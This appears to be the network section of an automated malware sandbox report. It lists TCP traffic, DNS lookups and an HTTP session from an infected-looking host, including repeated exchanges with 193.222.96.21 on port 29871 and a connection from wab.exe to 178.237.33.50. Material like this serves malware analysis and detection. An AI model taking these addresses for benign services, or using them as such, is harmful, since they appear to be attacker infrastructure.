Apr 24, 2024 07:14:38.307908058 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:15:01.929956913 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50 |
Apr 24, 2024 07:15:02.694789886 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50 |
Apr 24, 2024 07:15:04.304163933 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50 |
Apr 24, 2024 07:15:07.491843939 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50 |
Apr 24, 2024 07:15:08.767678022 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:15:08.769452095 CEST | 49713 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:15:09.120156050 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:15:13.601028919 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50 |
Apr 24, 2024 07:15:25.804239035 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50 |
Apr 24, 2024 07:15:39.581439018 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:15:39.587440014 CEST | 49713 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:15:39.948352098 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:15:50.007303953 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50 |
Apr 24, 2024 07:16:10.090158939 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:16:10.096414089 CEST | 49713 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:16:10.449846983 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:16:40.833359003 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:16:40.838202000 CEST | 49713 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:16:41.198183060 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 24, 2024 07:13:11.935368061 CEST | 51690 | 53 | 192.168.2.9 | 1.1.1.1 |
Apr 24, 2024 07:13:12.397959948 CEST | 53 | 51690 | 1.1.1.1 | 192.168.2.9 |
Apr 24, 2024 07:13:16.998541117 CEST | 60444 | 53 | 192.168.2.9 | 1.1.1.1 |
Apr 24, 2024 07:13:18.007380009 CEST | 60444 | 53 | 192.168.2.9 | 1.1.1.1 |
Apr 24, 2024 07:13:18.409533978 CEST | 53 | 60444 | 1.1.1.1 | 192.168.2.9 |
Apr 24, 2024 07:13:18.409550905 CEST | 53 | 60444 | 1.1.1.1 | 192.168.2.9 |
Apr 24, 2024 07:13:19.376108885 CEST | 61048 | 53 | 192.168.2.9 | 1.1.1.1 |
Apr 24, 2024 07:13:19.531780005 CEST | 53 | 61048 | 1.1.1.1 | 192.168.2.9 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 24, 2024 07:13:11.935368061 CEST | 192.168.2.9 | 1.1.1.1 | 0x7556 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 24, 2024 07:13:16.998541117 CEST | 192.168.2.9 | 1.1.1.1 | 0xf9e3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 24, 2024 07:13:18.007380009 CEST | 192.168.2.9 | 1.1.1.1 | 0xf9e3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 24, 2024 07:13:19.376108885 CEST | 192.168.2.9 | 1.1.1.1 | 0xdd7 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 24, 2024 07:13:12.397959948 CEST | 1.1.1.1 | 192.168.2.9 | 0x7556 | No error (0) | 104.21.60.38 | A (IP address) | IN (0x0001) | false | ||
Apr 24, 2024 07:13:12.397959948 CEST | 1.1.1.1 | 192.168.2.9 | 0x7556 | No error (0) | 172.67.191.112 | A (IP address) | IN (0x0001) | false | ||
Apr 24, 2024 07:13:18.409533978 CEST | 1.1.1.1 | 192.168.2.9 | 0xf9e3 | No error (0) | 193.222.96.21 | A (IP address) | IN (0x0001) | false | ||
Apr 24, 2024 07:13:18.409550905 CEST | 1.1.1.1 | 192.168.2.9 | 0xf9e3 | No error (0) | 193.222.96.21 | A (IP address) | IN (0x0001) | false | ||
Apr 24, 2024 07:13:19.531780005 CEST | 1.1.1.1 | 192.168.2.9 | 0xdd7 | No error (0) | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.9 | 49715 | 178.237.33.50 | 80 | 7500 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 24, 2024 07:13:19.837264061 CEST | 71 | OUT | |
Apr 24, 2024 07:13:20.147896051 CEST | 1173 | IN |